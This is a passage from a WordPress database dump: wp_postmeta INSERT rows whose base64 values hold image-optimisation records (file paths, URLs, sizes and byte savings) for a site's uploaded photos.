1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjc0MDY0MDQtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjc0MDY0MDQtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjU4NCwidGltZSI6MTQ4MzU4NTM3OCwiaWQiOjY3N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182NzQwNjQwNC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182NzQwNjQwNC0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182NzQwNjQwNC0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NzUwLCJ0aW1lIjoxNDgzNTg1MzgxLCJpZCI6Njc3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzY3NDA2NDA0LTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzY3NDA2NDA0LTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzY3NDA2NDA0LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo3OTIsInRpbWUiOjE0ODM1ODUzODUsImlkIjo2Nzd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjc0MDY0MDQtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjc0MDY0MDQtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjc0MDY0MDQtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjg5MSwidGltZSI6MTQ4MzU4NTM4OSwiaWQiOjY3N31d'); 
INSERT INTO `wp_postmeta` VALUES (30125, 676, 'wpfc_optimisation_reduction', '3011818'); 
INSERT INTO `wp_postmeta` VALUES (30126, 676, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzU2NDM1ODAzLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzU2NDM1ODAzLmpwZyIsIndpZHRoIjo0MjU2LCJoZWlnaHQiOjI4MzIsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNTY0MzU4MDMuanBnIiwicmVkdWN0aW9uIjozMDExODA1LCJ0aW1lIjoxNDgzNTg1NDAxLCJpZCI6IjY3NiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzU2NDM1ODAzLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzU2NDM1ODAzLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzU2NDM1ODAzLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1NDAzLCJpZCI6Njc2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja181NjQzNTgwMy04MDB4NTMyLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja181NjQzNTgwMy04MDB4NTMyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja181NjQzNTgwMy04MDB4NTMyLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTQwNiwiaWQiOjY3Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNTY0MzU4MDMtNzY4eDUxMS5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNTY0MzU4MDMtNzY4eDUxMS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNTY0MzU4MDMtNzY4eDUxMS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODU0MDksImlkIjo2NzZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzU2NDM1ODAzLTE2MDB4MTA2NS5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja181NjQzNTgwMy0xNjAweDEwNjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzU2NDM1ODAzLTE2MDB4MTA2NS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODU0MTMsImlkIjo2NzZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzU2NDM1ODAzLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzU2NDM1ODAzLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzU2NDM1ODAzLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1NDE1LCJpZCI6Njc2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja181NjQzNTgwMy0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja181NjQzNTgwMy0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja181NjQzNTgwMy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTQxOCwiaWQiOjY3Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNTY0MzU4MDMtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNTY0MzU4MDMtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNTY0MzU4MDMtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODU0MjAsImlkIjo2NzZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzU2NDM1ODAzLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzU2NDM1ODAzLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzU2NDM1ODAzLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1NDIzLCJpZCI6Njc2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzU2NDM1ODAzLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzU2NDM1ODAzLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzU2NDM1ODAzLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1NDI2LCJpZCI6Njc2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzU2NDM1ODAzLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzU2NDM1ODAzLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzU2NDM1ODAzLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1NDI4LCJpZCI6Njc2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzU2NDM1ODAzLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzU2NDM1ODAzLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzU2NDM1ODAzLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1NDMxLCJpZCI6Njc2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzU2NDM1ODAzLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzU2NDM1ODAzLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzU2NDM1ODAzLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1NDMzLCJpZCI6Njc2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzU2NDM1ODAzLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzU2NDM1ODAzLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzU2NDM1ODAzLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1NDM2LCJpZCI6Njc2fV0='); 
INSERT INTO `wp_postmeta` VALUES (30127, 630, 'wpfc_optimisation_reduction', '17193'); 
INSERT INTO `wp_postmeta` VALUES (30128, 630, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRXBvbi1yZXNpbi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Vwb24tcmVzaW4uanBnIiwid2lkdGgiOjU2MTYsImhlaWdodCI6Mzc0NCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4NTQ0MSwiaWQiOiI2MzAifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Vwb24tcmVzaW4tMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FcG9uLXJlc2luLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRXBvbi1yZXNpbi0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NjQ4LCJ0aW1lIjoxNDgzNTg1NDQ1LCJpZCI6NjMwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Vwb24tcmVzaW4tODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FcG9uLXJlc2luLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRXBvbi1yZXNpbi04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MTgwMiwidGltZSI6MTQ4MzU4NTQ0OCwiaWQiOjYzMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FcG9uLXJlc2luLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRXBvbi1yZXNpbi03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0Vwb24tcmVzaW4tNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjE2MzksInRpbWUiOjE0ODM1ODU0NTIsImlkIjo2MzB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRXBvbi1yZXNpbi0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FcG9uLXJlc2luLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FcG9uLXJlc2luLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjgwMDgsInRpbWUiOjE0ODM1ODU0NTYsImlkIjo2MzB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRXBvbi1yZXNpbi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Vwb24tcmVzaW4tMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FcG9uLXJlc2luLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1MzcsInRpbWUiOjE0ODM1ODU0NjAsImlkIjo2MzB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRXBvbi1yZXNpbi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Vwb24tcmVzaW4tMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FcG9uLXJlc2luLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0MjEsInRpbWUiOjE0ODM1ODU0NjMsImlkIjo2MzB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRXBvbi1yZXNpbi0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Vwb24tcmVzaW4tMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FcG9uLXJlc2luLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo0NjksInRpbWUiOjE0ODM1ODU0NjYsImlkIjo2MzB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRXBvbi1yZXNpbi01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Vwb24tcmVzaW4tNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FcG9uLXJlc2luLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxMTg4LCJ0aW1lIjoxNDgzNTg1NDcwLCJpZCI6NjMwfSx7InVybCI6Imh0dHBzOlwvXC9